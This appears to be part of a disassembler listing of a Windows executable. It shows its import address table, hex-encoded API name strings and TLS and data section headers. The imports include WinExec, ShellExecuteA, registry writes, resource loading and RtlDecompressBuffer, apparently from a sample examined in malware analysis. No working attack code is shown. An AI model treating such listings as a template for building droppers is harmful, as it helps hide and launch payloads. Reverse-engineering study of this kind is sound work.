dword_40024414 dd 7C809915h ; resolved to->KERNEL32.GetACPdword_40024418 dd 7C802442h ; resolved to->KERNEL32.Sleepdword_4002441C dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_40024420 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_40024424 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_40024428 dd 7C80A427h ; resolved to->KERNEL32.QueryPerformanceCounterdword_4002442C dd 7C809728h ; resolved to->KERNEL32.GetCurrentThreadIddword_40024430 dd 7C80977Ah ; resolved to->KERNEL32.InterlockedDecrementdword_40024434 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrementdword_40024438 dd 7C80B9D1h ; resolved to->KERNEL32.VirtualQuerydword_4002443C dd 7C80A0D4h ; resolved to->KERNEL32.WideCharToMultiBytedword_40024440 dd 7C809BF8h ; resolved to->KERNEL32.MultiByteToWideChardword_40024444 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenAdword_40024448 dd 7C810111h ; resolved to->KERNEL32.lstrcpynAdword_4002444C dd 7C801D4Fh ; resolved to->KERNEL32.LoadLibraryExAdword_40024450 dd 7C80A415h ; resolved to->KERNEL32.GetThreadLocaledword_40024454 dd 7C801EEEh ; resolved to->KERNEL32.GetStartupInfoAdword_40024458 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddressdword_4002445C dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleAdword_40024460 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_40024464 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoAdword_40024468 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Errordword_4002446C dd 7C812F1Dh ; resolved to->KERNEL32.GetCommandLineAdword_40024470 dd 7C80ABDEh ; resolved to->KERNEL32.FreeLibrarydword_40024474 dd 7C8137D9h ; resolved to->KERNEL32.FindFirstFileAdword_40024478 dd 7C80EDD7h ; resolved to->KERNEL32.FindClosedword_4002447C dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcessdword_40024480 dd 7C810D87h ; resolved to->KERNEL32.WriteFile ; .text:loc_400033E4�r
dword_40024484 dd 7C862E2Ah ; resolved to->KERNEL32.UnhandledExceptionFilterdword_40024488 dd 7C810B8Eh ; resolved to->KERNEL32.SetFilePointerdword_4002448C dd 7C832044h ; resolved to->KERNEL32.SetEndOfFiledword_40024490 dd 7C937A40h ; resolved to->NTDLL.RtlUnwinddword_40024494 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_40024498 dd 7C812A09h ; resolved to->KERNEL32.RaiseExceptiondword_4002449C dd 7C812F39h ; resolved to->KERNEL32.GetStdHandledword_400244A0 dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_400244A4 dd 7C810E51h ; resolved to->KERNEL32.GetFileTypedword_400244A8 dd 7C801A24h ; resolved to->KERNEL32.CreateFileAdword_400244AC dd 7C809B47h ; resolved to->KERNEL32.CloseHandle dd 0
dword_400244B4 dd 7C809BC5h ; resolved to->KERNEL32.TlsSetValuedword_400244B8 dd 7C809740h ; resolved to->KERNEL32.TlsGetValuedword_400244BC dd 7C80998Dh ; resolved to->KERNEL32.LocalAllocdword_400244C0 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA align 8
dword_400244C8 dd 7E41869Dh ; resolved to->USER32.ReleaseDCdword_400244CC dd 7E45058Ah ; resolved to->USER32.MessageBoxAdword_400244D0 dd 7E42DFA8h ; resolved to->USER32.LoadStringA dd 7E4208CEh
dword_400244D8 dd 7E418F9Ch ; resolved to->USER32.GetSystemMetricsdword_400244DC dd 7E418E78h ; resolved to->USER32.GetSysColordword_400244E0 dd 7E4186C7h ; resolved to->USER32.GetDCdword_400244E4 dd 7E42DF50h ; resolved to->USER32.CharNextAdword_400244E8 dd 7E41AEF1h ; resolved to->USER32.CharToOemA align 10h
dword_400244F0 dd 77F1D85Fh ; resolved to->GDI32.UnrealizeObjectdword_400244F4 dd 77F15D87h ; resolved to->GDI32.SetTextColordword_400244F8 dd 77F1D8F8h ; resolved to->GDI32.SetROP2dword_400244FC dd 77F15EEBh ; resolved to->GDI32.SetBkModedword_40024500 dd 77F15E39h ; resolved to->GDI32.SetBkColordword_40024504 dd 77F1832Ah ; resolved to->GDI32.SelectPalettedword_40024508 dd 77F15B80h ; resolved to->GDI32.SelectObjectdword_4002450C dd 77F1ADC3h ; resolved to->GDI32.MoveToExdword_40024510 dd 77F1DC1Fh ; resolved to->GDI32.GetTextMetricsAdword_40024514 dd 77F1B2F1h ; resolved to->GDI32.GetSystemPaletteEntries dd 77F161D1h
dword_4002451C dd 77F15A7Ah ; resolved to->GDI32.GetDeviceCapsdword_40024520 dd 77F2EAEBh ; resolved to->GDI32.GetCurrentPositionExdword_40024524 dd 77F16C0Ah ; resolved to->GDI32.DeleteObjectdword_40024528 dd 77F16E6Fh ; resolved to->GDI32.DeleteDCdword_4002452C dd 77F24077h ; resolved to->GDI32.CreatePenIndirectdword_40024530 dd 77F1B1F1h ; resolved to->GDI32.CreatePalettedword_40024534 dd 77F1E2E3h ; resolved to->GDI32.CreateFontIndirectAdword_40024538 dd 77F1D991h ; resolved to->GDI32.CreateBrushIndirect align 10h
dword_40024540 dd 7C835D54h ; resolved to->KERNEL32.WritePrivateProfileStringAdword_40024544 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_40024548 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_4002454C dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObjectdword_40024550 dd 7C80B9D1h ; resolved to->KERNEL32.VirtualQuerydword_40024554 dd 7C802442h ; resolved to->KERNEL32.Sleepdword_40024558 dd 7C80BC69h ; resolved to->KERNEL32.SizeofResourcedword_4002455C dd 7C810B8Eh ; resolved to->KERNEL32.SetFilePointerdword_40024560 dd 7C80A017h ; resolved to->KERNEL32.SetEventdword_40024564 dd 7C80A03Bh ; resolved to->KERNEL32.ResetEventdword_40024568 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_4002456C dd 7C809BF8h ; resolved to->KERNEL32.MultiByteToWideChardword_40024570 dd 7C8097C6h ; resolved to->KERNEL32.MulDivdword_40024574 dd 7C80CC97h ; resolved to->KERNEL32.SetHandleCountdword_40024578 dd 7C809FB5h ; resolved to->KERNEL32.LoadResourcedword_4002457C dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryAdword_40024580 dd 7C9010EDh ; resolved to->NTDLL.RtlLeaveCriticalSectiondword_40024584 dd 7C809EF1h ; resolved to->KERNEL32.InitializeCriticalSectiondword_40024588 dd 7C812ADEh ; resolved to->KERNEL32.GetVersionExAdword_4002458C dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_40024590 dd 7C80A415h ; resolved to->KERNEL32.GetThreadLocaledword_40024594 dd 7C835DCAh ; resolved to->KERNEL32.GetTempPathAdword_40024598 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryAdword_4002459C dd 7C812F39h ; resolved to->KERNEL32.GetStdHandledword_400245A0 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddressdword_400245A4 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleAdword_400245A8 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_400245AC dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoAdword_400245B0 dd 7C80A7D4h ; resolved to->KERNEL32.GetLocalTimedword_400245B4 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Errordword_400245B8 dd 7C814AF2h ; resolved to->KERNEL32.GetEnvironmentVariableAdword_400245BC dd 7C8302EDh ; resolved to->KERNEL32.GetDiskFreeSpaceAdword_400245C0 dd 7C8361EEh ; resolved to->KERNEL32.GetDateFormatAdword_400245C4 dd 7C809728h ; resolved to->KERNEL32.GetCurrentThreadIddword_400245C8 dd 7C812E76h ; resolved to->KERNEL32.GetCPInfodword_400245CC dd 7C8260C2h ; resolved to->KERNEL32.FreeResourcedword_400245D0 dd 7C80ABDEh ; resolved to->KERNEL32.FreeLibrarydword_400245D4 dd 7C82F7A0h ; resolved to->KERNEL32.FormatMessageAdword_400245D8 dd 7C80BE89h ; resolved to->KERNEL32.FindResourceAdword_400245DC dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcessdword_400245E0 dd 7C838211h ; resolved to->KERNEL32.EnumCalendarInfoAdword_400245E4 dd 7C901005h ; resolved to->NTDLL.RtlEnterCriticalSectiondword_400245E8 dd 7C91188Ah ; resolved to->NTDLL.RtlDeleteCriticalSectiondword_400245EC dd 7C801A24h ; resolved to->KERNEL32.CreateFileAdword_400245F0 dd 7C8308ADh ; resolved to->KERNEL32.CreateEventAdword_400245F4 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_400245F8 dd 7C80D077h ; resolved to->KERNEL32.CompareStringAdword_400245FC dd 7C809B47h ; resolved to->KERNEL32.CloseHandle dd 0
dword_40024604 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_40024608 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_4002460C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExAdword_40024610 dd 77DEB908h ; resolved to->ADVAPI32.RegFlushKeydword_40024614 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_40024618 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKeydword_4002461C dd 77DFD4C9h ; resolved to->ADVAPI32.GetUserNameA dd 0
dword_40024624 dd 7712A63Fh dword_40024628 dd 77124880h align 10h
dword_40024630 dd 774FEE36h dword_40024634 dd 77502A37h dd 0
dword_4002463C dd 7C802442h ; resolved to->KERNEL32.Sleep dd 0
dword_40024644 dd 7712ABCCh dword_40024648 dd 771251C8h dword_4002464C dd 77125214h dword_40024650 dd 7712AB11h dword_40024654 dd 77126BFFh dword_40024658 dd 77124D6Bh dword_4002465C dd 77124920h dword_40024660 dd 77124980h align 8
dword_40024668 dd 7C961329h ; resolved to->NTDLL.RtlDecompressBuffer align 10h
dword_40024670 dd 7CA41110h ; resolved to->SHELL32.ShellExecuteA align 8
aOleaut32_dll db 'oleaut32.dll',0
align 4
aSysfreestring db 'SysFreeString',0
align 4
aSysreallocstri db 'SysReAllocStringLen',0
dd 79530000h, 6C6C4173h, 7453636Fh, 676E6972h, 6E654Ch
dd 61766461h, 32336970h, 6C6C642Eh, 0
aRegqueryvaluee db 'RegQueryValueExA',0
align 4
aRegopenkeyexa db 'RegOpenKeyExA',0
align 4
aRegclosekey db 'RegCloseKey',0
aUser32_dll db 'user32.dll',0
align 4
dd 65470000h, 79654B74h, 72616F62h, 70795464h, 65h, 74736544h
dd 57796F72h, 6F646E69h, 77h, 64616F4Ch, 69727453h, 41676Eh
dd 654D0000h, 67617373h, 786F4265h, 41h, 72616843h, 7478654Eh
dd 656B0041h, 6C656E72h, 642E3233h, 6C6Ch, 65470000h, 50434174h
dd 0
aSleep db 'Sleep',0
align 4
aVirtualfree db 'VirtualFree',0
dd 69560000h, 61757472h, 6C6C416Ch, 636Fh, 65470000h, 63695474h
dd 756F436Bh, 746Eh, 75510000h, 50797265h, 6F667265h, 6E616D72h
dd 6F436563h, 65746E75h, 72h, 43746547h, 65727275h, 6854746Eh
dd 64616572h, 6449h, 6E490000h, 6C726574h, 656B636Fh, 63654464h
dd 656D6572h, 746Eh, 6E490000h, 6C726574h, 656B636Fh, 636E4964h
dd 656D6572h, 746Eh, 69560000h, 61757472h, 6575516Ch, 7972h
dd 69570000h, 68436564h, 6F547261h, 746C754Dh, 74794269h
dd 65h, 746C754Dh, 74794269h, 576F5465h, 43656469h, 726168h
dd 736C0000h, 656C7274h, 416Eh, 736C0000h, 70637274h, 416E79h
dd 6F4C0000h, 694C6461h, 72617262h, 41784579h, 0
aGetthreadlocal db 'GetThreadLocale',0
dd 65470000h, 61745374h, 70757472h, 6F666E49h, 41h, 50746547h
dd 41636F72h, 65726464h, 7373h, 65470000h, 646F4D74h, 48656C75h
dd 6C646E61h, 4165h, 65470000h, 646F4D74h, 46656C75h, 4E656C69h
dd 41656D61h, 0
aGetlocaleinfoa db 'GetLocaleInfoA',0
align 4
dd 65470000h, 73614C74h, 72724574h, 726Fh, 65470000h, 6D6F4374h
dd 646E616Dh, 656E694Ch, 41h, 65657246h, 7262694Ch, 797261h
dd 69460000h, 6946646Eh, 46747372h, 41656C69h, 0
aFindclose db 'FindClose',0
align 4
aExitprocess db 'ExitProcess',0
dd 72570000h, 46657469h, 656C69h, 6E550000h, 646E6168h
dd 4564656Ch, 70656378h, 6E6F6974h, 746C6946h, 7265h, 65530000h
dd 6C694674h, 696F5065h, 7265746Eh, 0
aSetendoffile db 'SetEndOfFile',0
align 4
aRtlunwind db 'RtlUnwind',0
align 10h
aReadfile db 'ReadFile',0
align 4
aRaiseexception db 'RaiseException',0
align 4
dd 65470000h, 64745374h, 646E6148h, 656Ch, 65470000h, 6C694674h
dd 7A695365h, 65h, 46746547h, 54656C69h, 657079h, 72430000h
dd 65746165h, 656C6946h, 41h, 736F6C43h, 6E614865h, 656C64h
dd 6E72656Bh, 32336C65h, 6C6C642Eh, 0
aTlssetvalue db 'TlsSetValue',0
dd 6C540000h, 74654773h, 756C6156h, 65h, 61636F4Ch, 6C6C416Ch
dd 636Fh, 65470000h, 646F4D74h, 48656C75h, 6C646E61h, 4165h
dd 72657375h, 642E3233h, 6C6Ch, 65520000h, 7361656Ch, 434465h
dd 654D0000h, 67617373h, 786F4265h, 41h, 64616F4Ch, 69727453h
dd 41676Eh, 6F4C0000h, 63496461h, 416E6Fh, 65470000h, 73795374h
dd 4D6D6574h, 69727465h, 7363h, 65470000h, 73795374h, 6F6C6F43h
dd 72h, 44746547h, 43h, 72616843h, 7478654Eh, 41h, 72616843h
dd 654F6F54h, 416Dh, 33696467h, 6C642E32h, 6Ch, 65726E55h
dd 7A696C61h, 6A624F65h, 746365h, 65530000h, 78655474h
dd 6C6F4374h, 726Fh, 65530000h, 504F5274h, 32h, 42746553h
dd 646F4D6Bh, 65h, 42746553h, 6C6F436Bh, 726Fh, 65530000h
dd 7463656Ch, 656C6150h, 657474h, 65530000h, 7463656Ch
dd 656A624Fh, 7463h, 6F4D0000h, 6F546576h, 7845h, 65470000h
dd 78655474h, 74654D74h, 73636972h, 41h, 53746547h, 65747379h
dd 6C61506Dh, 65747465h, 72746E45h, 736569h, 65470000h
dd 6F745374h, 624F6B63h, 7463656Ah, 0
aGetdevicecaps db 'GetDeviceCaps',0
align 10h
aGetcurrentposi db 'GetCurrentPositionEx',0
align 4
aDeleteobject db 'DeleteObject',0
align 4
aDeletedc db 'DeleteDC',0
align 4
aCreatepenindir db 'CreatePenIndirect',0
align 4
aCreatepalette db 'CreatePalette',0
align 4
aCreatefontindi db 'CreateFontIndirectA',0
dd 72430000h, 65746165h, 73757242h, 646E4968h, 63657269h
dd 656B0074h, 6C656E72h, 642E3233h, 6C6Ch, 72570000h, 50657469h
dd 61766972h, 72506574h, 6C69666Fh, 72745365h, 41676E69h
dd 0
aWritefile db 'WriteFile',0
align 4
aWinexec db 'WinExec',0
dd 61570000h, 6F467469h, 6E695372h, 4F656C67h, 63656A62h
dd 74h, 74726956h, 516C6175h, 79726575h, 0
aSleep_0 db 'Sleep',0
align 4
aSizeofresource db 'SizeofResource',0
align 4
dd 65530000h, 6C694674h, 696F5065h, 7265746Eh, 0
aSetevent db 'SetEvent',0
align 4
aResetevent db 'ResetEvent',0
align 10h
dd 65520000h, 69466461h, 656Ch, 754D0000h, 4269746Ch, 54657479h
dd 6469576Fh, 61684365h, 72h, 446C754Dh, 7669h, 6F4C0000h
dd 65526B63h, 72756F73h, 6563h, 6F4C0000h, 65526461h, 72756F73h
dd 6563h, 6F4C0000h, 694C6461h, 72617262h, 4179h, 654C0000h
dd 43657661h, 69746972h, 536C6163h, 69746365h, 6E6Fh, 6E490000h
dd 61697469h, 657A696Ch, 74697243h, 6C616369h, 74636553h
dd 6E6F69h, 65470000h, 72655674h, 6E6F6973h, 417845h, 65470000h
dd 63695474h, 756F436Bh, 746Eh, 65470000h, 72685474h, 4C646165h
dd 6C61636Fh, 65h, 54746547h, 50706D65h, 41687461h, 0
aGetsystemdirec db 'GetSystemDirectoryA',0
dd 65470000h, 64745374h, 646E6148h, 656Ch, 65470000h, 6F725074h
dd 64644163h, 73736572h, 0
aGetmodulehandl db 'GetModuleHandleA',0
align 10h
aGetmodulefilen db 'GetModuleFileNameA',0
align 4
dd 65470000h, 636F4C74h, 49656C61h, 416F666Eh, 0
aGetlocaltime db 'GetLocalTime',0
align 4
aGetlasterror db 'GetLastError',0
align 4
aGetenvironment db 'GetEnvironmentVariableA',0
dd 65470000h, 73694474h, 6572466Bh, 61705365h, 416563h
dd 65470000h, 74614474h, 726F4665h, 4174616Dh, 0
aGetcurrentthre db 'GetCurrentThreadId',0
align 4
dd 65470000h, 49504374h, 6F666Eh, 72460000h, 65526565h
dd 72756F73h, 6563h, 72460000h, 694C6565h, 72617262h, 79h
dd 6D726F46h, 654D7461h, 67617373h, 4165h, 69460000h, 6552646Eh
dd 72756F73h, 416563h, 78450000h, 72507469h, 7365636Fh
dd 73h, 6D756E45h, 656C6143h, 7261646Eh, 6F666E49h, 41h
dd 65746E45h, 69724372h, 61636974h, 6365536Ch, 6E6F6974h
dd 0
aDeletecritical db 'DeleteCriticalSection',0
align 4
aCreatefilea db 'CreateFileA',0
dd 72430000h, 65746165h, 6E657645h, 4174h, 6F430000h, 69467970h
dd 41656Ch, 6F430000h, 7261706Dh, 72745365h, 41676E69h
dd 0
aClosehandle db 'CloseHandle',0
aAdvapi32_dll db 'advapi32.dll',0
align 4
aRegsetvalueexa db 'RegSetValueExA',0
align 4
dd 65520000h, 65755167h, 61567972h, 4565756Ch, 4178h, 65520000h
dd 65704F67h, 79654B6Eh, 417845h, 65520000h, 756C4667h
dd 654B6873h, 79h, 43676552h, 74616572h, 79654B65h, 417845h
dd 65520000h, 6F6C4367h, 654B6573h, 79h, 55746547h, 4E726573h
dd 41656D61h, 6C6F0000h, 74756165h, 642E3233h, 6C6Ch, 65470000h
dd 72724574h, 6E49726Fh, 6F66h, 79530000h, 65724673h, 72745365h
dd 676E69h, 33656C6Fh, 6C642E32h, 6Ch, 6E556F43h, 74696E69h
dd 696C6169h, 657Ah, 6F430000h, 74696E49h, 696C6169h, 657Ah
dd 6E72656Bh, 32336C65h, 6C6C642Eh, 0
aSleep_1 db 'Sleep',0
aOleaut32_dll_0 db 'oleaut32.dll',0
align 4
dd 61530000h, 72416566h, 50796172h, 664F7274h, 65646E49h
dd 78h, 65666153h, 61727241h, 74654779h, 756F4255h, 646Eh
dd 61530000h, 72416566h, 47796172h, 424C7465h, 646E756Fh
dd 0
aSafearraycreat db 'SafeArrayCreate',0
dd 61560000h, 6E616972h, 61684374h, 5465676Eh, 657079h
dd 61560000h, 6E616972h, 706F4374h, 79h, 69726156h, 43746E61h
dd 7261656Ch, 0
aVariantinit db 'VariantInit',0
aNtdll_dll db 'ntdll.dll',0
align 4
aRtldecompressb db 'RtlDecompressBuffer',0
aShell32_dll db 'shell32.dll',0
dd 68530000h, 456C6C65h, 75636578h, 416574h
align 100h
_idata ends
; Section 6. (virtual address 00026000)
; Virtual size : 0000000C ( 12.)
; Section size in file : 0000000C ( 12.)
; Offset to raw data for section: 00026000
; Flags C0000000: Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Regular
; Segment permissions: Read/Write
_tls segment para public '' use32
assume cs:_tls
;org 40026000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
TlsStart dd 3 dup(0) ; DATA XREF: .rdata:TlsDirectory�o
TlsEnd dd 7Dh dup(?) ; DATA XREF: .rdata:TlsEnd_ptr�o
_tls ends
; Section 7. (virtual address 00027000)
; Virtual size : 00000018 ( 24.)
; Section size in file : 00000018 ( 24.)
; Offset to raw data for section: 00027000
; Flags 40000040: Data Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 40027000h
TlsDirectory dd offset TlsStart
TlsEnd_ptr dd offset TlsEnd
TlsIndex_ptr dd offset TlsIndex
TlsCallbacks_ptr dd offset TlsSizeOfZeroFill
TlsSizeOfZeroFill dd 0 ; DATA XREF: .rdata:TlsCallbacks_ptr�o
TlsCharacteristics dd 0
align 200h
_rdata ends
; Section 10. (virtual address 0005F000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0005EC00
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 4005F000h
align 2000h
_idata2 ends
end start